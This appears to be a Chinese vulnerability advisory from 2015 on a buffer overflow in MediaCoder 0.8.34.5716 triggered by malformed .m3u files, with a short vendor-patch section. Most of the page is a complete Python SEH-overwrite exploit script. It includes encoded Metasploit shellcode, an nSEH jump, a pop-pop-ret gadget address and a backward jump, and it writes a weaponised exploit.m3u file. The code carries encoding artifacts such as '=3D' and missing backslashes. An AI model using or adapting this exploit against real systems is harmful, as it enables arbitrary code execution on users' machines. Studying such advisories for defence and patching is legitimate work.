Mediacoder 0.8.34.5716版本缓冲区溢出漏洞发布日期:2015-05-06
更新日期:2015-05-07
受影响系统:MediaCoder MediaCoder 0.8.34.5716
描述:
MediaCoder是一个免费的通用音频/视频批量转码工具。
MediaCoder在处理畸形.m3u文件时存在缓冲区溢出漏洞,攻击者利用此漏洞可执行未授权操作。
<*来源:vendor
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com=20
# Version: 0.8.34.5716
# Tested on: Win XP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.=
info&file=3DMediaCoder-0.8.34.5716.exe
# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insifficient space after taking control of the EIP, you hav=
e to jump backwards and also=20
# avoid a few bad bytes after the "A"s.
#!/usr/bin/python
buffersize =3D 853
buffer =3D ("http://" + "x41" * 256)
#Space for shellcode to decode
buffer +=3D "x90" * 24
# msfpayload windows/exec CMD=3Dcalc R|msfencode -b "x00x0ax0dx20" -t c=
-e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1)
#unsigned char buf[] =3D=20
buffer +=3D("xddxc1xbdxc4x15xfdx3axd9x74x24xf4x5fx29xc9xb1"
"x32x31x6fx17x03x6fx17x83x2bxe9x1fxcfx4fxfax69"
"x30xafxfbx09xb8x4axcax1bxdex1fx7fxacx94x4dx8c"
"x47xf8x65x07x25xd5x8axa0x80x03xa5x31x25x8cx69"
"xf1x27x70x73x26x88x49xbcx3bxc9x8exa0xb4x9bx47"
"xafx67x0cxe3xedxbbx2dx23x7ax83x55x46xbcx70xec"
"x49xecx29x7bx01x14x41x23xb2x25x86x37x8ex6cxa3"
"x8cx64x6fx65xddx85x5ex49xb2xbbx6fx44xcaxfcx57"
"xb7xb9xf6xa4x4axbaxccxd7x90x4fxd1x7fx52xf7x31"
"x7exb7x6exb1x8cx7cxe4x9dx90x83x29x96xacx08xcc"
"x79x25x4axebx5dx6ex08x92xc4xcaxffxabx17xb2xa0"
"x09x53x50xb4x28x3ex3ex4bxb8x44x07x4bxc2x46x27"
"x24xf3xcdxa8x33x0cx04x8dxccx46x05xa7x44x0fxdf"
"xfax08xb0x35x38x35x33xbcxc0xc2x2bxb5xc5x8fxeb"
"x25xb7x80x99x49x64xa0x8bx29xebx32x57xae")
buffer +=3D "x42" * 350
nseh =3D "xEBx06x90x90"
# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]=20
seh=3D"xeex04x01x66"
#Jump back 603 bytes due to insufficient space for shellcode
jmpbck =3D "xe9xA5xfdxffxff"
junk =3D ("D" * 55)=20
f=3D open("exploit.m3u","w")
f.write(buffer + nseh + seh + jmpbck + junk)
f.close()
建议:
厂商补丁:
MediaCoder
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://mediacoder.com.cn/
易网时代-编程资源站